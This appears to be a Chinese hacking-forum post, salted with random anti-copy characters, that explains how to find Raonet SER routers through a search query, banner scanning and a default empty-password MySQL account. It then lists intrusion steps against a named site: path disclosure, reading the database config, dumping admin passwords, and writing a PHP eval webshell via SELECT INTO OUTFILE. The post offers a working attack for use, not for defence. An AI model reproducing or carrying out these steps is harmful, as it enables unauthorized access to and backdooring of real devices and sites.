寻找存在漏洞的路由器方法:7 [- h6 e7 H5 b. C! O: E% B1 E
+ N: S6 D, m$ i2 F4 ^2 ~1 p
1:google搜索'Raonet Subscriber Ethernet Router'
$ ]' o+ U* z( i c& M _$ k5 r
% i: C6 a5 O( o& a+ ^& N' Q1 R! ~2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001+ D9 j; l' N& Y( Z% |
6 S- p/ m& H' w2 G
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
+ `/ [( \$ a$ L, s4 B
. @6 Z: }. m* a2 Y" P//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成....... Q* s* S" ~, C; x6 P' n
/ f2 O: F" f% S8 G" u $ e* y2 H' y) R
4 z6 _7 n2 K7 ~2 X& r入侵步骤:: D, ~+ q- d$ l$ z8 P( o
+ d5 U: R5 @" p- z
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php! z+ L' ]9 e5 I. w. q
) N+ ]( F. H( x4 ^* L0 ]) |9 u
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc9 v8 {, u& }+ f& g6 o& @& j; {
3:得到密码后连接,查看GUI管理密码:
. ~9 S! S% P7 c0 Luse ser_500& Y; S; X9 q2 @. h0 _/ z
select id,passwd from user;
) I" @3 }" R, W5 y; J4:通过数据库写入webshell,执行命令:
8 m3 S- K2 \7 K% G3 muse mysql;2 d {! V$ @5 z1 w
create table ok(cmd TEXT);
* G4 c$ ], q) Z8 `# V- Ginsert into ok values("<?php @eval($_POST[cmd])?>");
4 I/ R' I2 c& Y* k# @+ N* ?9 lselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";& w/ o1 A- h7 h, m/ Q2 w
drop table ok;
& ]6 M4 ^8 ^5 p4 B0 r
- F# M# n6 {9 l8 N8 W$ i, i5:连接后门shell.php
6 [( v0 [0 T! M. P) N
! u: H3 G# k2 V4 c& ~9 S' |6. 搞定!
5 s( a0 Y8 I+ ?% U! \3 J; A0 j' d" K+ _6 R) J6 ^' e
|